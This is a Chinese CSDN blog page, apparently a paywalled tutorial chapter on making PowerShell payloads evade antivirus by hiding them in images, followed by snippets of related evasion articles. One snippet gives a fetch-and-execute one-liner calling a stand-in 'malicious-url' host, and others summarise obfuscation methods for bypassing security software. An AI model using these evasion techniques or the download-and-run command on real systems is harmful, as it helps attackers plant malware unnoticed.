第六章-10 使用powershell进行免杀

最新推荐文章于 2024-08-20 22:22:11 发布

划水的小白白

最新推荐文章于 2024-08-20 22:22:11 发布

阅读量610

点赞数 1

分类专栏： kali工具入门到进阶文章标签： CS 内网渗透免杀黑客白帽子

本文链接：https://blog.csdn.net/weixin_43970718/article/details/110224951

版权

本文详细介绍了如何使用PowerShell进行内网渗透的免杀技术，包括创建监听、生成payload，以及利用Psimage脚本将代码嵌入图片中以规避安全软件检测。还探讨了如何修改Powershell策略，并模拟受害者执行命令，同时提到在360等安全软件拦截下，如何通过MSF联动执行策略。

摘要由CSDN通过智能技术生成

零、说明

0.1说明

本文所有内容仅仅用于信息安全方面技术交流，

请读者切勿用于其他用途！！！

一、生成power shell

1.1创建监听

在这里插入图片描述

我这里创建一个监听，命名为bypass。

1.2生成payload

在这里插入图片描述

二、Psimage脚本

2.1原理

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

划水的小白白

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

我的powershell免杀之路

weixin_43939009的博客

07-11

1196

Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。powershell一直都是内网渗透的大热门，微软是真正的在推行PowerShell，包括Office等更多自家软件，底层都是调用PowerShell来实现，近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下。 / 这次我将结合前人的各种骚操作，以及个人的不断试错，所想所思，来写一篇关于powershell来进行免杀，达到CS多种姿势绕过AV

Powershell免杀

weixin_43526443的博客

07-08

725

目录 Somethingu have to know： 0x01调用混淆 0x02别名混淆 0x03转义符混淆 0x04 拆分混淆 0x05 例子 Somethingu have to know： ps1代码自身免杀，但在用powershell执行远程下载或执行shellcode时，很容易触发杀软行为规则，查杀主要靠行为检测，powershell混淆姿势有很多，如字符串转换、变量转换、编码、压缩等等。都是根据powershell语言的特性来混淆代码，从而绕过杀软。...

参与评论您还未登录，请先登录后发表或查看评论

powershell免杀详解

最新发布

m0_57836225的博客

08-20

884

也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`，通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释：PowerShell 模块是一种组织和封装 PowerShell 代码的方式，`.psm1`文件包含函数、变量、别名等，可以将一组相关的功能打包在一起，以便在多个脚本中重复使用，提高代码的可维护性和可重用性。

记一次PowerShell免杀实战

zhangge3663的博客

12-30

1730

最近在玩免杀，发现了一些免杀思路，今天来给大家做个分享，希望可以帮到大家。 0x01 powershell 加载 shellcode 介绍 UNIX 系统一直有着功能强大的壳程序(shell),Windows PowerShell的诞生就是要提供功能相当于UNIX系统的命令行壳程序(例如: sh、bash或csh),同时也内置脚本语言以及辅助脚本程序的工具，使命令行用户和脚本编写者可以利用.NET Framework的强大功能。 powershell具有在硬盘中易绕过，内存中难查杀的特点。一般在后渗透

msfvenom木马文件的免杀与隐藏技术探究

# 第一章：msfvenom 木马文件简介 ## 1.1 msfvenom 木马文件的定义 msfvenom是Metasploit框架中的一个强大工具，用于生成各种形式的恶意软件（包括木马文件）。msfvenom允许安全研究人员和渗透测试人员根据自己的...

第四章——权限提升分析及防御

willow_liang的博客

12-24

2942

第4章权限提升分析及防御在 Windows中，权限大概分为四种、分别是User、Administrator、System、TrustedInstaller。在这四种权限中，我们经常接触的是前三种。第四种权限 TrustedInstaller，在常规使用中通常不会涉及。 User:普通用户权限，是系统中最安全的权限（因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料)。 Administrator:管理员权限。可以利用Windows 的机制将自己提升为Svstem权限，以便操作SAM文件等。

第5章域内横向移动分析及防御

willow_liang的博客

12-26

3954

第5章域内横向移动分析及防御域内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术，尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术，以被攻陷的系统为跳板，访问其他域内主机,扩大资产范围（包括跳板机器中的文档和存储的凭证，以及通过跳板机器连接的数据库、域控制器或其他重要资产)。通过此类攻击手段，攻击者最终可能获取域控制器的访问权限，甚至完全控制基于Windows操作系统的基础设施和与业务相关的关键账户。因此，必须使用强口令来保护特权用户不被

第十八章——内网渗透之域渗透

L18296069161的博客

12-24

338

渗透学习交流群：773617250进群可免费领取学习工具，群内定期通知直播时间！欢迎大家进群学习交流！感谢大家的支持！ MSF 在讲域渗透之前，先给大家讲讲MSF ●kali代理配置 http://pawelli.com/archives/527 ●回顾msf知识 ●针对内网批量扫描 ms17-010 ●针对域成员 08R2 msf渗透并提权要点：针对对方是x64的架构生成一个x64的...

【免杀】powershell

zhangshuaiijie的博客

06-24

251

下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation。进入Invoke-Obfuscation目录，在powershell中执行。我看了好几篇去年的文章还是能过的，不过现在火狐和360都不能过去。不过在virscan和VirusTotal上面报毒还是很少的。如果报错，在管理员权限下powershell执行。

免杀-PowerShell

weixin_58782362的博客

11-20

778

win自带defender杀毒工具，所以defender和powershell用的同一种语言，很容易被查杀，所以我们尽量就不要用powershell。如果是powershell脚本，只要对方执行就能上线，如果是cmd，先输入powershell，然后payload.ps1。2、执行模式-直接执行命令（有上线代码），最好别在powershell终端执行，容易出错。1、直接在base64编码上添加，然后将垃圾数据替换为空，最后进行解码。混淆、手工混淆，将内容进行base64编码，然后进行解码。

Powershell 过火绒免杀上线

春日野穹

01-10

5261

引言拿到一台位于阿里云主机的shell，为IIS权限需要上线cs提权，主机自带阿里云盾和Windows Defender、且安装了火绒，为方便后续操作，需要进一步提权。 powershell免杀制作 payload生成原生payload生成后被无情秒杀 powershell免杀制作打开powershell命令行，将payload编码 1.新建一个变量h，用来接收之后编码的payload $h= '' 2.把FromBase64String放入变量$k中 $k=[System.Convert]

PowerShell命令免杀思路

qq_44657899的博客

11-08

1641

文章目录前言大小写管道符修改函数名命令拆分反引号处理低版本powershell使用Out-EncryptedScript加密免杀base64免杀组合拳前言 UNIX 系统一直有着功能强大的壳程序（shell），Windows PowerShell 的诞生就是要提供功能相当于 UNIX 系统的命令行壳程序（例如：sh、bash 或 csh），同时也内置脚本语言以及辅助脚本程序的工具，使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 powershell 具有在硬盘中易绕过，内存中

利用powershell进行免杀

PortugalCR7的博客

06-29

220

利用Invoke Obfuscation进行混淆。查看powershell的版本号（）

Powershell免杀系列（二）

st3pby的博客

02-20

3299

技术交流关注微信公众号 Z20安全团队 , 回复加群，拉你入群一起讨论技术。直接公众号文章复制过来的，排版可能有点乱，可以去公众号看。正文 powershell的免杀⽅法有很多，对代码进⾏编码是最常⻅的⼀种，这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation，这也是著名的APT32组织海莲花常⽤的⼀个⼯具。该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...

有了这个网络安全面试题，面试就像开了挂！（附PDF）

lvaolan的博客

02-26

928

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！内容实在太多，不一一截图了。

使用PowerShell高效管理Hyper-V环境

10. **故障排除与调试**：了解如何使用PowerShell工具进行问题排查，包括日志分析和cmdlet的调试技巧。通过本书的学习，读者将能够充分利用PowerShell的强大功能，提升Hyper-V环境的管理效率，实现自动化运维，...